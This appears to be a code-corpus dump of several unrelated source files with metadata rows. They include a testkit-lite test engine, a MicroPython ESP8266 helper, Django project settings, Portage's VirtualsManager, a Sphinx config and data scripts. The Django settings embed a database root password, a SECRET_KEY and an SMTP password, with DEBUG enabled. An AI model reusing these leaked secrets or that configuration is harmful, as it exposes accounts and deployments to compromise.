product_price_type_obj = self.pool['product.price.type']
product_price_type_ids = product_price_type_obj.search(cr, uid, [], context=context)
product_price_type_obj.write(cr, uid, product_price_type_ids, {'currency_id': values.get('currency_id')}, context=context)
return res
| agpl-3.0 | 6,659,984,753,844,151,000 | 37.465116 | 134 | 0.602781 | false |
Shao-Feng/testkit-lite | testkitlite/engines/pyunit.py | 4 | 5751 | #!/usr/bin/python
#
# Copyright (C) 2012 Intel Corporation
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# Authors:
# Chengtao,Liu <[email protected]>
""" The implementation of pyunit test engine"""
import os
import time
import sys
import threading
import uuid
import StringIO
import unittest
from unittest import TestResult
from datetime import datetime
from testkitlite.util.log import LOGGER
from testkitlite.util.result import TestSetResut
DATE_FORMAT_STR = "%Y-%m-%d %H:%M:%S"
result_buffer = None
class LiteTestResult(TestResult):
"""Python unittest result wrapper"""
def startTest(self, test):
super(LiteTestResult, self).startTest(test)
self._case = {}
case_full_id = test.id()
self._case['case_id'] = case_full_id
self._case['start_at'] = datetime.now().strftime(DATE_FORMAT_STR)
def stopTest(self, test):
self._case['end_at'] = datetime.now().strftime(DATE_FORMAT_STR)
super(LiteTestResult, self).stopTest(test)
if result_buffer is not None:
result_buffer.extend_result([self._case])
def addSuccess(self, test):
super(LiteTestResult, self).addSuccess(test)
self._case['result'] = 'PASS'
def addError(self, test, err):
super(LiteTestResult, self).addError(test, err)
_, _exc_str = self.errors[-1]
self._case['result'] = 'BLOCK'
self._case['stdout'] = '[message]' + _exc_str
def addFailure(self, test, err):
super(LiteTestResult, self).addFailure(test, err)
_, _exc_str = self.failures[-1]
self._case['result'] = 'FAIL'
self._case['stdout'] = '[message]' + _exc_str
def _pyunit_test_exec(test_session, cases, result_obj):
"""function for running core tests"""
global result_buffer
result_buffer = result_obj
result_obj.set_status(0)
total = unittest.TestSuite()
for tc in cases['cases']:
if tc['entry'].find(os.sep) != -1:
arr = tc['entry'].split(os.sep)
path = tc['entry'][:tc['entry'].rindex(os.sep)]
case = arr[-1]
else:
path = os.getcwd()
case = tc['entry']
try:
tests = unittest.TestLoader().discover(path, pattern='''%s''' %case)
total.addTest(tests)
# unittest.TextTestRunner(resultclass=LiteTestResult, buffer=True).run(tests)
except ImportError as error:
pass
try:
unittest.TextTestRunner(resultclass=LiteTestResult, buffer=True).run(total)
except ImportError as error:
pass
#result_obj.extend_result(resultclass)
result_obj.set_status(1)
class TestWorker(object):
"""Test executor for testkit-lite"""
def __init__(self, conn):
super(TestWorker, self).__init__()
self.conn = conn
self.server_url = None
self.result_obj = None
self.opts = dict({'block_size': 300,
'test_type': None,
'auto_iu': False,
'fuzzy_match': False,
'self_exec': False,
'self_repeat': False,
'debug_mode': False
})
def init_test(self, params):
"""init the test envrionment"""
self.opts['testset_name'] = params.get('testset-name', '')
self.opts['testsuite_name'] = params.get('testsuite-name', '')
self.opts['debug_log_base'] = params.get("debug-log-base", '')
return str(uuid.uuid1())
def run_test(self, sessionid, test_set):
"""
process the execution for a test set
"""
if sessionid is None:
return False
disabledlog = os.environ.get("disabledlog","")
# start debug trace thread
if len(disabledlog) > 0 :
pass
else:
self.conn.start_debug(self.opts['debug_log_base'])
time.sleep(1)
self.result_obj = TestSetResut(
self.opts['testsuite_name'], self.opts['testset_name'])
# self.opts['async_th'] = threading.Thread(
# target=_pyunit_test_exec,
# args=(sessionid, test_set['test_set_src'], test_set, self.result_obj)
# )
self.opts['async_th'] = threading.Thread(
target=_pyunit_test_exec,
args=(sessionid, test_set, self.result_obj)
)
self.opts['async_th'].start()
return True
def get_test_status(self, sessionid):
"""poll the test task status"""
if sessionid is None:
return None
result = {}
result["msg"] = []
result["finished"] = str(self.result_obj.get_status())
return result
def get_test_result(self, sessionid):
"""get the test result for a test set """
result = {}
if sessionid is None:
return result
result = self.result_obj.get_result()
return result
def finalize_test(self, sessionid):
"""clear the test stub and related resources"""
if sessionid is None:
return False
if self.result_obj is not None:
self.result_obj.set_status(1)
# stop debug thread
self.conn.stop_debug()
return True
| gpl-2.0 | 2,795,866,676,022,362,600 | 31.308989 | 88 | 0.586854 | false |
dan-cristian/haiot | apps/esp8266_vent_motor/common.py | 1 | 2605 | # https://github.com/micropython/micropython/issues/2352
import esp
from flashbdev import bdev
import machine
import ujson
import mqtt
ADC_MODE_VCC = 255
ADC_MODE_ADC = 0
rtc = machine.RTC()
class rtc_storage:
mqtts = 0
mqttp = 0
closed = 1
angle = 0
def set_adc_mode(mode):
sector_size = bdev.SEC_SIZE
flash_size = esp.flash_size() # device dependent
init_sector = int(flash_size / sector_size - 4)
data = bytearray(esp.flash_read(init_sector * sector_size, sector_size))
if data[107] == mode:
return # flash is already correct; nothing to do
else:
data[107] = mode # re-write flash
esp.flash_erase(init_sector)
esp.flash_write(init_sector * sector_size, data)
print("ADC mode changed in flash; restart to use it!")
return
def init_deep_sleep(sleep_sec=60):
# configure RTC.ALARM0 to be able to wake the device
rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)
# set RTC.ALARM0 to fire after 60 seconds (waking the device)
rtc.alarm(rtc.ALARM0, sleep_sec * 1000)
save_rtc()
# mqtt.disconnect()
print("Entering deep sleep")
machine.deepsleep()
def save_rtc():
try:
stor_dict = rtc_storage.__dict__.copy() # needs a copy otherwise pop won't work
# print("Saving dict {}".format(stor_dict))
stor_dict.pop("__module__", None)
stor_dict.pop("__qualname__", None)
json = ujson.dumps(stor_dict)
print("Saving to rtc: {}".format(json))
rtc.memory(json)
except Exception as ex:
print("Unable to save rtc, ex={}".format(ex))
def read_rtc():
mem = rtc.memory()
print("Reading from rtc: {}".format(mem))
if mem is not None and len(mem) > 0:
mems = str(mem, "utf-8") # replace("b'{", "{").replace("}'", "}")
try:
obj = ujson.loads(mems)
if type(obj) is dict:
for key in obj.keys():
setattr(rtc_storage, key, obj[key])
# P.closed = int(mem)
print("Read rtc memory closed={} sub={} pub={}".format(
rtc_storage.closed, rtc_storage.mqtts, rtc_storage.mqttp))
else:
print("Unexpected rtc object type {}".format(obj))
except ValueError as ve:
print("Unable to convert from rtc json: {}, json was:{}".format(ve, mems))
def publish_state():
vcc = machine.ADC(1).read()
# send current state to mqtt
mqtt.publish('{{"vcc": {},"angle": {}, "mqttp": {}}}'.format(
vcc, rtc_storage.angle, rtc_storage.mqttp))
| gpl-2.0 | 8,380,810,964,129,800,000 | 30.385542 | 88 | 0.588868 | false |
hackers-terabit/portage | pym/portage/package/ebuild/_config/VirtualsManager.py | 16 | 6654 | # Copyright 2010 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
__all__ = (
'VirtualsManager',
)
from copy import deepcopy
from portage import os
from portage.dep import Atom
from portage.exception import InvalidAtom
from portage.localization import _
from portage.util import grabdict, stack_dictlist, writemsg
from portage.versions import cpv_getkey
class VirtualsManager(object):
def __init__(self, *args, **kwargs):
if kwargs.get("_copy"):
return
assert len(args) == 1, "VirtualsManager.__init__ takes one positional argument"
assert not kwargs, "unknown keyword argument(s) '%s' passed to VirtualsManager.__init__" % \
", ".join(kwargs)
profiles = args[0]
self._virtuals = None
self._dirVirtuals = None
self._virts_p = None
# Virtuals obtained from the vartree
self._treeVirtuals = None
# Virtuals added by the depgraph via self.add_depgraph_virtuals().
self._depgraphVirtuals = {}
#Initialise _dirVirtuals.
self._read_dirVirtuals(profiles)
#We could initialise _treeVirtuals here, but some consumers want to
#pass their own vartree.
def _read_dirVirtuals(self, profiles):
"""
Read the 'virtuals' file in all profiles.
"""
virtuals_list = []
for x in profiles:
virtuals_file = os.path.join(x, "virtuals")
virtuals_dict = grabdict(virtuals_file)
atoms_dict = {}
for k, v in virtuals_dict.items():
try:
virt_atom = Atom(k)
except InvalidAtom:
virt_atom = None
else:
if virt_atom.blocker or \
str(virt_atom) != str(virt_atom.cp):
virt_atom = None
if virt_atom is None:
writemsg(_("--- Invalid virtuals atom in %s: %s\n") % \
(virtuals_file, k), noiselevel=-1)
continue
providers = []
for atom in v:
atom_orig = atom
if atom[:1] == '-':
# allow incrementals
atom = atom[1:]
try:
atom = Atom(atom)
except InvalidAtom:
atom = None
else:
if atom.blocker:
atom = None
if atom is None:
writemsg(_("--- Invalid atom in %s: %s\n") % \
(virtuals_file, atom_orig), noiselevel=-1)
else:
if atom_orig == str(atom):
# normal atom, so return as Atom instance
providers.append(atom)
else:
# atom has special prefix, so return as string
providers.append(atom_orig)
if providers:
atoms_dict[virt_atom] = providers
if atoms_dict:
virtuals_list.append(atoms_dict)
self._dirVirtuals = stack_dictlist(virtuals_list, incremental=True)
for virt in self._dirVirtuals:
# Preference for virtuals decreases from left to right.
self._dirVirtuals[virt].reverse()
def __deepcopy__(self, memo=None):
if memo is None:
memo = {}
result = VirtualsManager(_copy=True)
memo[id(self)] = result
# immutable attributes (internal policy ensures lack of mutation)
# _treeVirtuals is initilised by _populate_treeVirtuals().
# Before that it's 'None'.
result._treeVirtuals = self._treeVirtuals
memo[id(self._treeVirtuals)] = self._treeVirtuals
# _dirVirtuals is initilised by __init__.
result._dirVirtuals = self._dirVirtuals
memo[id(self._dirVirtuals)] = self._dirVirtuals
# mutable attributes (change when add_depgraph_virtuals() is called)
result._virtuals = deepcopy(self._virtuals, memo)
result._depgraphVirtuals = deepcopy(self._depgraphVirtuals, memo)
result._virts_p = deepcopy(self._virts_p, memo)
return result
def _compile_virtuals(self):
"""Stack installed and profile virtuals. Preference for virtuals
decreases from left to right.
Order of preference:
1. installed and in profile
2. installed only
3. profile only
"""
assert self._treeVirtuals is not None, "_populate_treeVirtuals() must be called before " + \
"any query about virtuals"
# Virtuals by profile+tree preferences.
ptVirtuals = {}
for virt, installed_list in self._treeVirtuals.items():
profile_list = self._dirVirtuals.get(virt, None)
if not profile_list:
continue
for cp in installed_list:
if cp in profile_list:
ptVirtuals.setdefault(virt, [])
ptVirtuals[virt].append(cp)
virtuals = stack_dictlist([ptVirtuals, self._treeVirtuals,
self._dirVirtuals, self._depgraphVirtuals])
self._virtuals = virtuals
self._virts_p = None
def getvirtuals(self):
"""
Computes self._virtuals if necessary and returns it.
self._virtuals is only computed on the first call.
"""
if self._virtuals is None:
self._compile_virtuals()
return self._virtuals
def _populate_treeVirtuals(self, vartree):
"""
Initialize _treeVirtuals from the given vartree.
It must not have been initialized already, otherwise
our assumptions about immutability don't hold.
"""
assert self._treeVirtuals is None, "treeVirtuals must not be reinitialized"
self._treeVirtuals = {}
for provide, cpv_list in vartree.get_all_provides().items():
try:
provide = Atom(provide)
except InvalidAtom:
continue
self._treeVirtuals[provide.cp] = \
[Atom(cpv_getkey(cpv)) for cpv in cpv_list]
def populate_treeVirtuals_if_needed(self, vartree):
"""
Initialize _treeVirtuals if it hasn't been done already.
This is a hack for consumers that already have an populated vartree.
"""
if self._treeVirtuals is not None:
return
self._populate_treeVirtuals(vartree)
def add_depgraph_virtuals(self, mycpv, virts):
"""This updates the preferences for old-style virtuals,
affecting the behavior of dep_expand() and dep_check()
calls. It can change dbapi.match() behavior since that
calls dep_expand(). However, dbapi instances have
internal match caches that are not invalidated when
preferences are updated here. This can potentially
lead to some inconsistency (relevant to bug #1343)."""
#Ensure that self._virtuals is populated.
if self._virtuals is None:
self.getvirtuals()
modified = False
cp = Atom(cpv_getkey(mycpv))
for virt in virts:
try:
virt = Atom(virt).cp
except InvalidAtom:
continue
providers = self._virtuals.get(virt)
if providers and cp in providers:
continue
providers = self._depgraphVirtuals.get(virt)
if providers is None:
providers = []
self._depgraphVirtuals[virt] = providers
if cp not in providers:
providers.append(cp)
modified = True
if modified:
self._compile_virtuals()
def get_virts_p(self):
if self._virts_p is not None:
return self._virts_p
virts = self.getvirtuals()
virts_p = {}
for x in virts:
vkeysplit = x.split("/")
if vkeysplit[1] not in virts_p:
virts_p[vkeysplit[1]] = virts[x]
self._virts_p = virts_p
return virts_p
| gpl-2.0 | 1,610,628,014,105,041,000 | 27.55794 | 94 | 0.685152 | false |
cbingos/cpro | cpro/settings.py | 1 | 10357 | # -*- coding: utf-8 -*-
import os
import sys
DEBUG = True
TEMPLATE_DEBUG = DEBUG
#PREPEND_WWW = True#301 redirect to wwww
APPEND_SLASH = True#url add end "/"
ADMINS = (
('cbin', '[email protected]'),
)
ADMIN_EXPORTERS = (
# 'djadmin_export.exporters.xlsx.XLSXExporter',
)
MANAGERS = ADMINS
dbpath = os.path.dirname(os.path.dirname(__file__))
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'cpro', # Or path to database file if using sqlite3.
'USER': 'root', # Not used with sqlite3.
'PASSWORD': 'ruoxuan12', # Not used with sqlite3.
'HOST': 'localhost', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '3306',
'AUTOCOMMIT': True,
#'NAME': 'sqlite3-db',
#'ATOMIC_REQUESTS': True, # Set to empty string for default. Not used with sqlite3.
}
}
if 'testserver' in sys.argv:
DATABASES['default']['TEST_NAME'] = '%s/TEST_cpro.db'%dbpath
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
#USE_TZ=False
TIME_ZONE = 'Asia/Shanghai'#'Atlantic/St_Helena'#'Asia/Shanghai'
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en//ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'zh-cn'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
HERE = os.path.dirname(os.path.dirname(__file__))
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
#MEDIA_ROOT = os.path.join( HERE ,'media').replace('\\','/')
#MEDIA_ROOT = HERE
#MEDIA_URL = '/media/'
STATIC_ROOT = os.path.join(HERE,'static').replace('\\','/')
MEDIA_ROOT = os.path.join(HERE,'media').replace('\\','/')
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(HERE,'/static/').replace('\\','/'),
("images", os.path.join(STATIC_ROOT, 'images')),
('js', os.path.join(STATIC_ROOT, 'js')),
('css', os.path.join(STATIC_ROOT, 'css')),
('admin',os.path.join(STATIC_ROOT,'admin')),
('grappelli', os.path.join(STATIC_ROOT, 'grappelli')),
#('ueditor', os.path.join(STATIC_ROOT, 'ueditor')),
#('xadmin', os.path.join(STATIC_ROOT, 'xadmin')),
('nvd3', os.path.join(STATIC_ROOT, 'nvd3')),
('filebrowser', os.path.join(STATIC_ROOT, 'filebrowser')),
('d3', os.path.join(STATIC_ROOT, 'd3')),
("uploads", os.path.join(MEDIA_ROOT, 'upload')),
('upimages',os.path.join(MEDIA_ROOT, '../media/upimages')),
("thumbnail", os.path.join(MEDIA_ROOT, 'thumbnail')),
#("upfile",os.path.join(MEDIA_ROOT,'upfile'))
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'g2xqy*_3dwwv-81eav#^(=rf=+*snvy6=pk#+hn88^a9ii*%5s'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.request",
'django.contrib.messages.context_processors.messages',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.transaction.TransactionMiddleware',
'pagination.middleware.PaginationMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'cpro.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'cpro.wsgi.application'
import os
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), '..', 'templates').replace('\\','/'),)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
#'profiles',
#'DjangoUeditor',
'haystack',
'mptt',
'taggit',
'registration',
'pagination',
'ems',
'projectchart',
'easy_thumbnails',
'grappelli.dashboard',
'grappelli',
'filebrowser',
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.whoosh_cn_backend.WhooshEngine',
'PATH': os.path.join(os.path.dirname(__file__), 'whoosh_index'),
'STORAGE': 'file',
'POST_LIMIT': 128 * 1024 * 1024,
'INCLUDE_SPELLING': True,
'BATCH_SIZE': 100,
},
}
HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.RealtimeSignalProcessor'
THUMBNAIL_ALIASES = {
'': {
'avar': {'size': (50, 50), 'crop': True},
},
}
GRAPPELLI_ADMIN_TITLE=u"后台管理系统"
GRAPPELLI_INDEX_DASHBOARD = 'cpro.cprodashboard.CustomIndexDashboard'
from django.conf import settings
MEDIA_ROOT = getattr(settings, "FILEBROWSER_MEDIA_ROOT", settings.MEDIA_ROOT)
MEDIA_URL = getattr(settings, "FILEBROWSER_MEDIA_URL", settings.MEDIA_URL)
DIRECTORY = getattr(settings, "FILEBROWSER_DIRECTORY", 'uploads/')
EXTENSIONS = getattr(settings, "FILEBROWSER_EXTENSIONS", {
#'Folder': [''],
'Image': ['.jpg','.jpeg','.gif','.png','.tif','.tiff'],
'Document': ['.pdf','.doc','.rtf','.txt','.xls','.csv'],
'Video': ['.mov','.wmv','.mpeg','.mpg','.avi','.rm','flv',],
'Audio': ['.mp3','.mp4','.wav','.aiff','.midi','.m4p']
})
SELECT_FORMATS = getattr(settings, "FILEBROWSER_SELECT_FORMATS", {
'file': ['Image','Document','Video','Audio'],
'image': ['Image'],
'document': ['Document'],
'media': ['Video','Audio'],
})
#ACCOUNT_ACTIVATION_DAYS = 7
#for registration activation days
SIGNUP_ACTIVATION_DAYS = 7
# sigup activation days
AUTH_PROFILE_MODULE = "userprofile.UserProfile"
"""
#email setting
FAILED_RUNS_CRONJOB_EMAIL_PREFIX = "[email protected]"
EMAIL_HOST = 'smtp.webfaction.com'
EMAIL_HOST_USER = 'cbingo '
EMAIL_HOST_PASSWORD = 'Xuan20120419'
DEFAULT_FROM_EMAIL = '[email protected]'
SERVER_EMAIL = '[email protected]'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
"""
"""
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
UEDITOR_SETTINGS={
"toolbars":{ #定义多个工具栏显示的按钮,允行定义多个
"name1":[[ 'source', '|','bold', 'italic', 'underline']],
"name2":[],
},
"images_upload":{
"allow_type":"jpg,png,gif,jpeg,gif", #定义允许的上传的图片类型
"path":"upimages", #定义默认的上传路径
"max_size":"22220kb" #定义允许上传的图片大小,0代表不限制
},
"files_upload":{
"allow_type":"zip,rar", #定义允许的上传的文件类型
"path":'upload',#定义默认的上传路径
"max_size":"22220kb",#定义允许上传的文件大小,0代表不限制
},
"image_manager":{
"path":"upimages",#图片管理器的位置,如果没有指定,默认跟图片路径上传一样
},
"scrawl_upload":{
"path":"upimages" #涂鸦图片默认的上传路径
}
}"""
| mit | 8,115,872,049,929,756,000 | 35.003571 | 111 | 0.627716 | false |
tzolov/hortonworks-gallery.github.io | tsv_import.py | 2 | 1157 | #!/usr/bin/python
import sys
import csv
import json
tsvProjectFile = open(sys.argv[1], 'r')
projectFile = open('src/projects/repos.json', 'w')
fieldnames = ("projectTitle","projectDescription","featured","category","subcategory", "url", "repoAccount", "repoName", "buttonText", "included", "contributors")
reader = csv.DictReader( tsvProjectFile, fieldnames, delimiter='\t')
reader.next()
projectFile.write("[")
items = []
for row in reader:
if row["included"] == "TRUE":
category = "{\"categories\": [{\"name\": \""+row["category"]+"\"}," + "{\"name\": \""+row["subcategory"]+"\"}"
if row["featured"] == "TRUE":
category += ",{\"name\": \"featured\"}"
category += "]"
items.append(category + ", \"title\": \"" + row["projectTitle"] + "\", \"description\": \"" + row["projectDescription"] + "\", \"cta_1_url\": \"" + row["url"] + "\", \"cta_1_text\": \"" + row["buttonText"] + "\", \"repo_account\": \"" + row["repoAccount"] + "\", \"repo_name\": \"" + row["repoName"] + "\", \"contributors\": \"" + row["contributors"] + "\"}\n")
projectFile.write(",".join(items))
projectFile.write("]")
projectFile.close() | apache-2.0 | 6,400,279,880,035,483,000 | 49.347826 | 369 | 0.576491 | false |
pluralsight/guides-cms | docs/conf.py | 2 | 8657 | # -*- coding: utf-8 -*-
#
# Hacker-guides CMS documentation build configuration file, created by
# sphinx-quickstart on Thu Nov 19 08:51:06 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'alabaster',
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Hacker Guides CMS'
copyright = u'2016, Pluralsight LLC'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '.1'
# The full version, including alpha/beta/rc tags.
release = '.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'logo': 'logo-white.png',
'github_button': True,
'github_banner': True,
'github_user': 'pluralsight',
'github_repo': 'guides-cms',
}
html_sidebars = {
'**': [
'about.html',
'navigation.html',
'relations.html',
'searchbox.html',
]
}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'HackerGuidesCMSdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'HackerGuidesCMS.tex', u'Hacker Guides CMS Documentation',
u'Pluralsight LLC', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'hackerguidescms', u'Hacker Guides CMS Documentation',
[u'Pluralsight LLC'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'HackerGuidesCMS', u'Hacker Guides CMS Documentation',
u'Pluralsight LLC', 'HackerGuidesCMS', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| agpl-3.0 | -5,459,976,400,695,646,000 | 30.028674 | 79 | 0.701398 | false |
mircealungu/Zeeguu-Core | tools/learner_level.py | 1 | 1584 | #!/usr/bin/env python
"""
Script that lists recent users
To be called from a cron job.
"""
from sortedcontainers import SortedList
from zeeguu_core.model import User, Bookmark
from wordstats import Word
user = User.find_by_id(1890)
language = 'nl'
months_dict = dict()
for bookmark in Bookmark.query.filter_by(user=user):
if not bookmark.origin.language.code == language:
continue
# if not bookmark.quality_bookmark():
# continue
if len(bookmark.origin.word) < 4:
continue
date_key = bookmark.time.strftime("%y-%m")
if date_key not in months_dict:
months_dict[date_key] = SortedList(key=lambda x: x.rank)
word_stats = Word.stats(bookmark.origin.word, language)
if word_stats.rank == 100000:
print("ignoring: " + bookmark.origin.word)
print(word_stats.rank)
continue
# our user has a lot of het's
# might make sense to keep a word only once
if word_stats not in months_dict[date_key]:
months_dict[date_key].add(word_stats)
for key in months_dict:
len_for_month = len(months_dict[key])
